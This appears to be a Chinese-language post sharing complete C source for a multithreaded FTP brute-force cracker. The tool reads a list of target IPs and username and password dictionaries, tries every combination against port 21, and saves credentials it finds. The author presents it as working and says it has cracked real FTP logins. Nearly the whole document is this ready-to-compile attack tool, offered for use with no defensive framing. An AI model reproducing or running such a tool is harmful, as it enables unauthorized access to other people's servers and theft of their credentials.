这个程序是用来进行暴力破解的,只需在命令行下输入:
ftp ip.txt 100
其中ip.txt为你要探测的ftp服务器的ip地址,每一行一个ip地址!100为你想要开的线程数!
而其中的必需有两个文件,ftp_user.txt,ftp_pass.txt,跟这段代码生成的可执行程序放在同一个目录下,以上的ip.txt也要放在同一个目录下!只要ftp_user.txt,ftp_pass.txt这两个字典选得好,不长的时间就可以将密码探测出来!本来这段代码是没有把探测出来的密码保存的,我加了几句,可以将用户名和密码都保存下来,分别在同一个目录下的user.txt,和ftp.txt中!
以下的源码在VC6.0下编译通过!!!并曾正确破译出ftp的用户名和密码!
//
//描述:从指定文件读入IP地址和帐号密码,猜测ftp服务器密码
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib,"ws2_32.lib")
#define PORT 21
#define VERSION 0.1.2
#define LEN sizeof(struct FILEDATA)
/
//定义全局变量
/
struct FILEDATA//存放帐号和密码的链表结构体
{
char dataLine[64];
struct FILEDATA *next;
};
struct SCANPAR//传递给Scan函数的参数结构体
{
struct FILEDATA *userHead;//帐号链表的头地址
struct FILEDATA *passHead;//密码链表的头地址
char ipNow[16];//要扫描的扫描的IP
};
int currentThread = 0;//当前活动线程
int maxThread = 0;//最大线程数量
char ipFile[48] = { 0 };//IP列表文件名
char *passFlag = "230";
char *userFlag = "331";
/
//定义函数原形
/
void GetPar(int , char **);//检查命令行参数
void Help(char *);//输出帮助函数
void WatchThread(void);//检测活动线程是否达到最大
void Wait2Quit(void);//等待所有线程退出函数
int WINAPI Scan(LPVOID);//处理帐号密码字典
void Crack(char * , char * , char *);//破解密码函数
struct FILEDATA *ReadDic2Memory(char *);//将帐号字典密码字典读入内存,存入链表
//
//主函数,程序入口
//
int main( int argc , char *argv[] )
{
DWORD threadID = 1;
HANDLE threadHandle = NULL;
FILE *fpIP = NULL;
WSADATA wsaData;
struct SCANPAR scanPar;
char fileName[48] = { 0 };
//检查并获取命令行参数
GetPar( argc , argv );
if( WSAStartup(MAKEWORD(2,2),&wsaData) != 0 )
{
printf( "载入Winsock失败.../n" );
return -1;
}
//打开IP列表文件
fpIP = fopen( ipFile , "r" );
if( fpIP == NULL )
{
printf( "打开IP列表文件失败.../n" );
return -1;
}
strcpy( fileName , "ftp_user.txt" );
scanPar.userHead = ReadDic2Memory( fileName );//将帐号读入内存
memset( fileName , 0 , sizeof(fileName) );
strcpy( fileName , "ftp_pass.txt" );
scanPar.passHead = ReadDic2Memory( fileName );//将密码读入内存
while( !feof(fpIP) )
{
fscanf( fpIP , "%s" , scanPar.ipNow );
WatchThread();
Sleep(20);
//生成新线程
threadHandle = CreateThread( NULL , 0 , (LPTHREAD_START_ROUTINE)Scan , (LPVOID)(&scanPar) , 0 , &threadID );
if( threadHandle != NULL )
{
CloseHandle(threadHandle);
currentThread ++;
threadID ++;
}
}
Wait2Quit();
fclose(fpIP);
WSACleanup();
return 0;
}
int WINAPI Scan(LPVOID par)
{
struct SCANPAR *scan_Par = (struct SCANPAR *)par;
struct FILEDATA *pUser = scan_Par->userHead;
struct FILEDATA *pPass = scan_Par->passHead;
while( pUser != NULL )
{
if( pPass == NULL )
{
pPass = scan_Par->passHead;
}
while( pPass != NULL )
{
printf("正在%s上测试%s的密码%s....../n" , scan_Par->ipNow , pUser->dataLine , pPass->dataLine );
Crack( scan_Par->ipNow , pUser->dataLine , pPass->dataLine );
pPass = pPass->next;
}
pUser = pUser->next;
}
currentThread --;
return 0;
}
void Crack( char *ip , char *user , char *pass )
{
SOCKET sock;
SOCKADDR_IN sin;
int flag;
int timeOut;
char recvBuffer[1024] = { 0 };
sock = socket( AF_INET , SOCK_STREAM , 0 );
if( sock == INVALID_SOCKET )
{
printf( "连接%s建立socket失败/n" ,ip);
return;
}
//设置超时时间
timeOut = 2000;
if( setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeOut, sizeof(timeOut)) == SOCKET_ERROR )
{
printf("连接%s设置超时失败/n" , ip );
return;
}
memset( &sin , 0 , sizeof(sin) );
sin.sin_family = AF_INET;
sin.sin_port = htons(PORT);
sin.sin_addr.s_addr = inet_addr(ip);
flag = connect( sock , (struct sockaddr *)&sin , sizeof(sin) );
if( flag == SOCKET_ERROR )
{
printf( "连接服务器%s失败/n" , ip );
closesocket(sock);
return;
}
flag = recv( sock , recvBuffer , sizeof(recvBuffer) , 0 );
if( flag == SOCKET_ERROR )
{
printf( "%s接受banner数据失败/n" , ip);
closesocket(sock);
return;
}
char userCmd[48] = { 0 };
wsprintf( userCmd , "USER %s/r/n" , user );
flag = send( sock , userCmd , strlen(userCmd) , 0 );
if( flag == SOCKET_ERROR )
{
printf( "%s发送帐号失败/n" , ip );
closesocket(sock);
return;
}
memset( recvBuffer , 0 ,sizeof(recvBuffer) );
flag = recv( sock , recvBuffer , sizeof(recvBuffer) , 0 );
if( flag == SOCKET_ERROR )
{
printf( "%s接受user数据失败/n" , ip );
closesocket(sock);
return;
}
if( strlen(recvBuffer) == 0 )
{
printf( "%s接受user数据失败/n" , ip );
closesocket(sock);
return;
}
if( strstr(recvBuffer , userFlag) == NULL )
{
printf( "%s用户名没能通过/n" , ip );
closesocket(sock);
return;
}
char passCmd[48] = { 0 };
wsprintf( passCmd , "PASS %s/r/n" , pass );
flag = send( sock , passCmd , strlen(passCmd) , 0 );
if( flag == SOCKET_ERROR )
{
printf( "%s发送密码失败/n" , ip );
closesocket(sock);
return;
}
memset( recvBuffer , 0 , sizeof(recvBuffer) );
flag = recv( sock , recvBuffer , sizeof(recvBuffer) , 0 );
if( flag == SOCKET_ERROR )
{
printf( "%s接受pass数据失败/n" , ip );
closesocket(sock);
return;
}
//
if(strstr(recvBuffer , passFlag))
{
printf( "发现密码:%s/t%s/t%s/n" , ip , user , pass );
FILE * fp;
fp = fopen("pwd.txt","wt+");
fwrite(pass,sizeof(pass),1,fp);
fclose(fp);
FILE * fp1;
fp1 = fopen("user.txt","wt+");
fwrite(user,sizeof(user),1,fp1);
fclose(fp1);
}
closesocket(sock);
return;
}
struct FILEDATA *ReadDic2Memory( char *fileName )
{
struct FILEDATA *p1 = NULL;
struct FILEDATA *p2 = NULL;
struct FILEDATA *head = NULL;
FILE *fp = NULL;
int num = 0;//节点数目
p1 = p2 = (struct FILEDATA *)malloc(LEN);//开辟新内存单元
if( p1 == NULL )
{
printf( "开辟新内存单元失败.../n" );
exit(-1);
}
fp = fopen( fileName , "r" );//打开文件句柄
if( fp == NULL )
{
printf( "打开文件%s失败.../n" , fileName );
exit(-1);
}
while( !feof(fp) )
{
num = num + 1;
fscanf( fp , "%s" , p1->dataLine );
if( num == 1 )//如果是第一个节点
{
head = p1;
}
else
{
p2->next = p1;
}
p2 = p1;
p1 = (struct FILEDATA *)malloc(LEN);
fscanf( fp , "%s" , p1->dataLine );
}
p2->next = NULL;
return head;
}
void GetPar( int argc , char *argv[] )
{
//检查命令行参数
if( argc != 3 )
{
Help( argv[0] );
return;
}
if( strlen(argv[1]) < 48 )
{
strcpy( ipFile , argv[1] );
}
else
{
printf( "IP列表文件名太长.../n" );
return;
}
//从命令行参数获取最大线程数
maxThread = atoi( argv[2] );
if( maxThread <= 0 )
{
printf( "最大线程数错误.../n" );
return;
}
}
void WatchThread()
{
while(1)
{
if( currentThread >= maxThread )
{
Sleep(10);
}
else
{
break;
}
}
}
void Wait2Quit()
{
while(1)
{
if( currentThread > 0 )
{
Sleep(10);
}
else
{
break;
}
}
}
void Help(char *program)
{
printf( "Usage:%s/tIP.txt/tMaxThread/n" , program );
exit(-1);
}